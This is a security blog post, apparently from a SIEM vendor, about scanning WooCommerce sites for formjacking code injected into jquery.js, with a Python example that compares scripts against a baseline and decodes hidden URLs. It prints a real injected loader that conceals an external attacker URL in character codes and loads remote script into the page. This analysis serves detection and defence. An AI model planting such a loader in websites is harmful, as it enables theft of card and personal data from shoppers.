We have always focused on backend security on this blog. However, attackers also target the front end, for example to steal sensitive information such as credit card numbers. That's why we piloted LogSentinel SIEM's Script Monitoring feature, which aims to protect websites from front-end attacks, including formjacking/Magecart/form scraping as well as redirecting users to malicious sites. The British Airways breach is a famous example of such an attack, performed by injecting code into static JavaScript files. Our script verification feature lets you monitor all code changes in real time.
We decided to use our script verification utilities to investigate how many sites using WooCommerce may be compromised. For that purpose, we obtained a list of a few hundred thousand WooCommerce URLs and scanned the most likely target of attacks – jquery.js, the script that every WordPress installation has, and that is included on every page, including the credit card information page.
The results are optimistic. Out of 236,146 scanned websites, only 44 appear to be compromised. Usually, the injected script is obfuscated and includes scripts from external sources (after multiple redirects). We did not assess each individual malicious script, but they can in theory collect any data entered on the page and/or redirect to a malicious website. We have contacted the owners of those sites with instructions to have them fixed.
The scanning approach relies on having the canonical jQuery (either the original or the WordPress-bundled version) as a baseline and comparing the site's jquery.js file against it (minified or not). In case of any discrepancy (after some basic normalization), a mismatch is reported, which is then investigated individually. In some cases, website admins have opted for the questionable practice of manually editing their jquery.js file, so the method yields some false positives, but these were removed as part of the analysis.
Here is a typical malicious script appended (or prepended) to jquery.js:
var gdjfgjfgj235f = 1; // junk variable, likely a marker so the injection is not applied twice
var d = document;
var s = d.createElement('script');
s.type = 'text/javascript';
s.async = true;
// The loader URL is hidden as a sequence of character codes instead of a plain string
var pl = String.fromCharCode(104,116,116,112,115,58,47,47,115,99,114,105,112,116,115,46,116,114,97,115,110,97,108,116,101,109,121,114,101,99,111,114,100,115,46,99,111,109,47,116,97,108,107,46,106,115,63,116,114,97,99,107,61,114,38,115,117,98,105,100,61,48,54,48);
s.src = pl;
// Insert the external script next to the current one, falling back to <head>
if (document.currentScript) {
    document.currentScript.parentNode.insertBefore(s, document.currentScript);
} else {
    d.getElementsByTagName('head')[0].appendChild(s);
}
The URL from which the malicious script is fetched is encoded (here as a String.fromCharCode sequence), so we have to decode it and follow it. Using curl, one can follow the chain of redirects that usually follows in order to see the actual script, which either collects data from forms on the screen or opens a malicious website. jquery.js is only one potential script – we are currently inspecting all credit-card-related WooCommerce scripts as well.
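The baseline comparison described above and the decoding of the hidden loader URL, as an added example that is not LogSentinel's scanner code. The baseline script, the injected snippet and the URL it encodes are all constructed placeholders; a real scan would use the original or WordPress-bundled jquery.js as the baseline.

```python
import re

# Constructed stand-in for the canonical jquery.js baseline (not real jQuery).
BASELINES = {
    "jquery-constructed": "/*! jQuery stand-in */\r\n(function(w){ w.$ = function(s){ return s; }; })(window);\r\n",
}

# Constructed injected loader in the style shown above; the URL is a placeholder, not a real indicator.
_CODES = ",".join(str(ord(c)) for c in "https://example.invalid/t.js")
INJECTED = ("var d=document;var s=d.createElement('script');"
            "var pl=String.fromCharCode(" + _CODES + ");s.src=pl;"
            "d.getElementsByTagName('head')[0].appendChild(s);")

def normalize(src: str) -> str:
    """Basic normalization before comparison: drop a BOM, unify line endings, collapse whitespace."""
    src = src.lstrip("\ufeff").replace("\r\n", "\n")
    return re.sub(r"\s+", " ", src).strip()

def decode_fromcharcode(js: str) -> list:
    """Decode every String.fromCharCode(n,n,...) call so the hidden URL becomes readable."""
    out = []
    for m in re.finditer(r"String\.fromCharCode\(([\d,\s]+)\)", js):
        out.append("".join(chr(int(n)) for n in m.group(1).split(",") if n.strip()))
    return out

def check_script(fetched: str, baselines=BASELINES) -> dict:
    """Compare a fetched jquery.js against the baselines and report any prepended or appended code."""
    n = normalize(fetched)
    for name, base in baselines.items():
        nb = normalize(base)
        if n == nb:
            return {"status": "match", "baseline": name}
        if n.endswith(nb):            # something was prepended to the genuine file
            extra, pos = n[:-len(nb)], "prepended"
        elif n.startswith(nb):        # something was appended to the genuine file
            extra, pos = n[len(nb):], "appended"
        else:
            continue
        return {"status": "mismatch", "baseline": name, "position": pos,
                "extra": extra.strip(), "decoded_urls": decode_fromcharcode(extra)}
    # Edited in the middle or an unknown version: flag for manual investigation
    return {"status": "mismatch", "baseline": None, "position": "unknown",
            "extra": None, "decoded_urls": decode_fromcharcode(n)}
```

A match from a manually edited but benign jquery.js will still come back as a mismatch; that is the false-positive case the analysis has to weed out by hand.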
The numbers are good for now, but malicious actors are actively seeking ways to compromise eCommerce websites, and with the rise of eCommerce due to the pandemic, all off-the-shelf platforms (WooCommerce, Magento, Shopify, OpenCart) should be closely monitored for changes.
If you would like to reduce data breach risks through your frontend and significantly improve your compliance with security and privacy regulations (e.g. GDPR, HIPAA, PCI DSS), talk to us today and let us show you how LogSentinel SIEM can help you increase information security.


Bozhidar Bozhanov is a senior software engineer and solution architect with 15 years of experience in the software industry. Bozhidar has been a speaker at numerous conferences and is among the popular bloggers and influencers in the technical field. He’s also a former government advisor on e-government, transparency, and information security.